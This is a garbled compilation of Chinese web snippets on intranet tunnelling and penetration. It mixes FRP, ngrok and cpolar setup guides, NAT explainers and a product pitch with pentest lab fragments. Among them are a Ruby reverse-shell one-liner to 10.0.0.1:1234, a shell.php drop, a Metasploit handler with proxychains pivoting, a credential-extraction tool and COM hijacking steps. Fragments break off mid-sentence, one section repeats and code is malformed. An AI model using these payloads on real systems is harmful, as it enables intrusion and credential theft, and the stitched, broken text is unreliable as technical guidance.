---- 内网跨边界应用 前言 与内网渗透系列:内网穿透(隧道)学习可以互相补充 一、内网跨边界转发 1、NC端口转发 netcat瑞士军刀 参见Kali linux 学习笔记(四)基本工具熟悉——nc ,内网dns解析、内网socks5代理等等 4、frp github:https://github.com/fatedier/frp 用Go写的,支持TCP和UDP,以及HTTP和HTTPS协议,同时也支持 脚本 PHP程序确认php.ini中socket模块正常开启并且可用,reGeorge也提供了nosocket脚本 linux下利用proxychains,Windows下利用proxifier实现任意应用通过代理 >&3 2>&3");' 5、ruby ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i >&3 2>&3');" 四、内网文件的传输和下载 1、wput wput dir_name ftp://linuxpig:123456@host.com/ 2、wget wget http://site.com
最近没什么特别急的事情,浏览了一些内网穿透的文章,因我自己本身也是一个热衷于IT行业的人,加之大学也是学的网络工程的(虽然现在荒废的差不多了),对这部分关注的比较多,今天分享下我对内网穿透的理解。 名词解析,内网穿透,即NAT穿透,网络连接时术语,计算机是局域网内时,外网与内网的计算机节点需要连接通信,有时就会出现不支持内网穿透。 按这个解释,内网穿透,只要实现了如下图的索引服务器访问到左下角内网的192.168.1.77服务器或者访问到右下角192.168.1.88服务器就算内网穿透成功。 image.png 所以这么理解内网穿透就是一个DNAT的应用了,不过大家在正常使用的情况下不会有这么简单的网络环境的,就像上图,可能需要从左下角的内网访问到右下角的内网,这就是一个比较实际的例子了, 贝瑞的花生壳产品,中继模式加内网穿透,还有DDNS,免费版的限流限带宽; 贝瑞的蒲公英产品,异地组网产品,内网穿透,P2P技术,可以追加组网点位数和带宽质量; 零遁的NAS伴侣,外网访问内网服务,内网穿透
靶机下载地址:http://vulnstack.qiyuanxuetang.net/vuln/ win7(双网卡): 192.168.1.18外网) 192.168.138.136(内网) win2008 ^>>shell.php image.png image.png 上线C2 image.png ---- 内网渗透 image.png image.png 内网存活主机探测 image.png
web应用。 二、 部署在局域网中,只能内网发访问,如企业内网、私有云中,这种情况下默认只能在内网中访问,如需要在公网访问,就需要类似于ZeroNews这样的代理专家提供代理域名实现公网访问。 而 ZeroNews 作为一应用代理访问专家,为用户提供可自定义的 zeronews 域名就支持企业自有域名的访问为企业及个人提供稳定、可靠的应用代理服务,实现企业内网应用公网访问。 通过自建站点发布服务,需要考虑1、 服务器性能2、 成本效益初期成本:需投入硬件、、网络带宽、软件及运维成本维护成本:第三方DNS服务通常按查询量、功能模块(如负载均衡、DDoS防护)收费3、 安全策略安全策略自定义 2、 成本效益即买即用:无需采购多种硬件设施,也无需更改现有网络架构,按需订阅即可3、 安全策略:多种自定义策略:支持IP访问控制能力,支持鉴权认证能力(可以参考zeronews_basic_auth_policy
去ST的官网下载最新版(Sublime Text 3),免费用户会不时有弹窗,不过不影响使用。 http://www.sublimetext.com/3 安装好ST3之后,安装Package Control。 因为内网需要使用代理,故默认的安装Package Control的方式无效,只能手动安装。 ST3的代理。 更多可定制配置,可以查看Preferences > Package Settings > Package Control > Settings – Default 结语: ST3的Proxy配置,配置起来
前言 随着3D打印技术的普及,从创意模型到功能性部件的制作场景日益丰富。当用户需要实时掌握打印状态并实施远程操控时,传统操作方式已难以满足实际需求。 OctoPrint作为开源3D打印管理平台,通过网页端为用户提供可视化控制界面。该系统支持实时监控打印过程、上传G代码文件以及执行启停等指令操作,极大提升了3D打印的智能化水平。 针对这一技术瓶颈,业界推荐采用反向代理方案(如cpolar工具),通过建立内网穿透通道,将本地3D打印设备的服务端口映射至公网环境。已完成系统部署的用户可直接进行网络穿透配置,跳过基础安装步骤。 Ubuntu安装Cpolar 上面在本地ubuntu中成功部署了OctoPrint 工具,并本地访问成功,下面我们在Linux安装Cpolar内网穿透工具,通过Cpolar 穿透本地端口映射http的公网地址 然而,它的缺点是网址由随机字符生成,不太容易记忆(例如:https://1fd5a347.r3.cpolar.cn/)。另外,这个地址在24小时内会发生随机变化,更适合于临时使用。
项目介绍 PassGet是一款使用Go语言编写的用于后渗透测试阶段提取Windows平台下常见的应用程序(例如:向日葵、FinalShell)和浏览器一段认证凭据的项目 支持应用 目前支持如下应用: App
一、背景 笔者最近折腾docker服务比较多,这几天想把在内网中的服务搬到公网当中,但docker对内存要求较高,而云服务高内存的服务器又比较贵,家里虽然有一台旧笔记本内存还可以,但是没有公网IP地址, 视乎还是没有办法,就在纠结的时候想起FRP这个内网穿透软件,重新回顾了一下搭建方法,发现搭建步骤较为简单,为了以后有所参考,所以把搭建步骤详细记录了下来。 二、操作步骤 配置服务端 配置客户端 检验与测试 三、配置服务端 FRP分为服务端与客户端,一个服务端可以对应多个客户端,笔者首先需要在服务器中下载并安装FRP 3.1 文件选择 frp是开源的一个内网穿透软件 listen on 0.0.0.0:8888 2018/08/29 23:43:30 [I] [root.go:207] Start frps success 四、配置客户端 在配置服务端完成之后,笔者还需要在内网中配置客户端 ,现在笔者需要通过ssh登录和web服务来验证服务是否可用,操作步骤如下 5.1 测试Web服务 测试Web服务是否穿透可以通过访问外网地址,如果能打开内网中的Web服务便说明搭建成功,这里需要搭建一个虚拟主机
内网IP与公网IP:划分、区别与应用在计算机网络的世界里,IP地址作为设备的唯一标识符,扮演着至关重要的角色。IP地址主要分为两大类:内网IP(也称为私有IP)和公网IP(也称为公共IP)。 这两类IP地址在划分、功能及应用上存在着显著的差异。一、内网IP与公网IP的划分内网IP(私有IP) 内网IP是在局域网(LAN)或私有网络中使用的IP地址。 公网IP地址用于访问互联网上的其他设备和服务器,如网站、应用程序等。由于公网IP资源有限,通常需要向ISP申请和分配。 三、内网IP与公网IP的应用内网IP的应用局域网内部通信:内网IP用于局域网内的设备之间的通信和连接。NAT技术:通过NAT技术,内网设备可以访问互联网,同时节省公网IP资源。 安全性提升:内网IP的隐蔽性提高了网络的安全性,减少了外部攻击的风险。公网IP的应用全球访问性:拥有公网IP的设备可以直接访问整个互联网,实现跨地域连接和数据传输。
内网穿透 目录 内网穿透 内网穿透工具 学了网络之后,我们知道了公网和私网。私网是不能在公网传输和通信的。我们一个学校,一个小区,都是在自己单独的私网里面。 内网穿透 这就要说到内网穿透了! 如下图,有这么一个环境。小明和小王分别是清华和北大的学生。他们都各自处在自己学校的内网中,他们的ip地址可以是一样的,都是192.168.10.2。 因为在路由器体内有一个私网ip和端口的对照表,每个私网ip对应一个端口,所以根据端口就能知道消息是发送给内网中的哪台主机了。 192.168.10.10:22222 <——> 10000 当我们访问百度这个事情做完之后的一定时间内,Session记录就会在路由器的体内消失,这个10000端口可以继续分配给其他用户 那么现在我们再来分析一下位于内网中的我们如何和同样是内网中的小伙伴通过 内网穿透工具 常用的内网穿透的工具有:NAT APP基于ngrok的国内高速内网转发工具 这款软件可以把你内网的ip和端口映射成一个公网的ip和端口,这样,我们就可以实现内网穿透了!
内网穿透 目录 内网穿透 内网穿透工具 学了网络之后,我们知道了公网和私网。私网是不能在公网传输和通信的。我们一个学校,一个小区,都是在自己单独的私网里面。 内网穿透 这就要说到内网穿透了! 如下图,有这么一个环境。小明和小王分别是清华和北大的学生。他们都各自处在自己学校的内网中,他们的ip地址可以是一样的,都是192.168.10.2。 因为在路由器体内有一个私网ip和端口的对照表,每个私网ip对应一个端口,所以根据端口就能知道消息是发送给内网中的哪台主机了。 那么现在我们再来分析一下位于内网中的我们如何和同样是内网中的小伙伴通过QQ通信。 内网穿透工具 常用的内网穿透的工具有:NAT APP基于ngrok的国内高速内网转发工具 这款软件可以把你内网的ip和端口映射成一个公网的ip和端口,这样,我们就可以实现内网穿透了!
ngrok针对主要的编程语言都提供了 SDK,这里以 node.js 为例,看看如何使用 ngrok SDK 实现应用程序内网穿透。 1. 安装 ngrok SDK npm install @ngrok/ngrok 3. 运行应用程序 NGROK_AUTHTOKEN=<YOUR_AUTH_TOKEN> node index.js 替换 <YOUR_AUTH_TOKEN> 为 ngrok 网站上注册的令牌。
/frps.ini 3、修改客户端 frpc.ini 文件,设置 frps 所在的服务器的 IP 为 x.x.x.x,local_port 为本地机器上 web 服务对应的端口: [common] server_addr auth_token = 123 //服务器端的配置文件中的auth_token [web] type = http //同服务器端 local_port = 80 //内网程序端口 /frpc.ini 5、通过浏览器访问 http://www.yourdomain.com:8080 即可访问到处于内网机器上的 web 服务
我们可以利用VMware搭建出3层网络的网络环境,首先在虚拟机中新建3块网卡,并选择仅主机模式: ? 同理,将第二层靶机win2003设为双网卡vmnet2和vmnet3: ? 最后,将第三层靶机linux的网络设为vmnet3: ? 至此,我们本次试验的3层网络靶场已经搭建完毕,攻击者的kali只能访问第一层网络,而无法访问第二层和第三层的靶机: ? MSF制作的后门,所以在插上u盘之后,员工的办公电脑就已经被黑客控制,黑客从而可以进一步进行内网渗透、横向扩展。 Meterpreter shell作为渗透模块有很多有用的功能,比如添加一个用户、打开shell、得到用户密码、上传下载远程主机的文件、运行cmd.exe、捕捉屏幕、得到远程控制权、捕获按键信息、清除应用程序
在用路由器连接的内网中,可以将网络划分为三个区域:安全级别最高的内网;安全级别中等的DMZ;安全级别最低的外网(Internet)。 ? ? 在配置一个拥有DMZ的网络时,通常需要定义如下访问控制策略 内网可以访问外网:内网用户需要自由地访问外网。 DMZ不能访问内网:如不执行,攻击者攻陷DMZ时,厄尼旺将无法收到保护 DMZ不能访问外网:有例外 内网可以分为办公区和核心区(横向移动攻击的优先查找目标) 域中计算机的分类 域控制器 通常有文件服务器、应用服务器、数据库服务器、WEB服务器、邮件服务器、防火墙、远程访问服务器、打印服务器等 客户机 独立服务器 如果服务器既不加入域,也不安装活动目录,就称其为独立服务器。 附带一份内网学习思维导图 ? ?
在用路由器连接的内网中,可以将网络划分为三个区域:安全级别最高的内网;安全级别中等的DMZ;安全级别最低的外网(Internet)。 ? 在配置一个拥有DMZ的网络时,通常需要定义如下访问控制策略 内网可以访问外网:内网用户需要自由地访问外网。 DMZ不能访问内网:如不执行,攻击者攻陷DMZ时,厄尼旺将无法收到保护 DMZ不能访问外网:有例外 内网可以分为办公区和核心区(横向移动攻击的优先查找目标) 域中计算机的分类 域控制器 通常有文件服务器、应用服务器、数据库服务器、WEB服务器、邮件服务器、防火墙、远程访问服务器、打印服务器等 客户机 独立服务器 如果服务器既不加入域,也不安装活动目录,就称其为独立服务器。 附带一份内网学习思维导图 ?
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings" 查询并开启远程连接服务 查看远程连接端口(0xd3d MSF 是全平台的,无论是win,linux,mac都可以打,但 Empire 是只针对 Windows 的 MSF 集信息收集,渗透,后渗透,木马,社工的功能为一体,全面多能;而 Empire 专注于内网渗透 www.freebuf.com/articles/system/114731.html https://blog.csdn.net/bring_coco/article/details/113550173 ---- 往期推荐 内网学习笔记 | 2、PowerShell 内网学习笔记 | 1、内网中常见名词解释 经验总结 | CS与MSF之间的会话传递
Date/time:2013年,很久没写技术文章了,记得之前写过MSF的reverse、bind两种反弹方式在实战中的应用,这次来写一篇MSF综合应用到内网渗透的实战文章。 root@box3:~# msfconsole msf > use exploit/multi/handler msf exploit(handler) > set PAYLOAD windows/x64 root@box3:~# vi /etc/proxychains.conf 开启Socks4a代理并配置好proxychains代理工具,这时我们就可以在命令终端中直接用proxychains代理msf root@box3:~# proxychains msfconsole -q root@box3:~# proxychains rdesktop 192.168.0.206 注:开启了Socks4a代理但无法正常使用时有可能是防火墙的问题 ,只有Webshell权限,这时可以采用迂回战术,先进入内网搜集密码组合字典,然后再去搞我们的目标主机; 内网中MSF可以扫描A、B段主机吗?
整个攻击模拟专项,主要分为以下五个步骤: 02 — 攻击链设计 在第I期的基础上,引入了供应链软件攻击、内网横向攻击,同时加入两台不同操作系统的服务器进行双向攻击,让模拟更贴近实战、让应急响应场景更加复杂 Windows2008 x64 R2(无补丁版本) PHP 5.2.17 MySQL 5.6 phpcms V9.6 1)Phpstudy2016/2018供应链后门版本2)HFS Rejetto 2.x版本3) CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections 6.3.4 COM组件劫持 利⽤{42aedc87-2188-41fd-b9a3- ,添加/修改数据: C:\ProgramData\Package Cache\{BCDE0395-E52F-467C-8E3DC4579291692E}\api-ms-win-downlevel-1x86 6.5 横向移动 6.5.1 内网主机探测 查看地址解析情况arp –a,发现C段存活主机 6.5.2 端口与目录扫描 18:05,上传扫描⼯具 TxPortMap_windows_amd64.exe
image.png 视频内容 内网渗透之内网隧道构建 1080P超清版 微信公众号平台本身会对素材进行二次压缩,会导致画面出现不清晰等情况。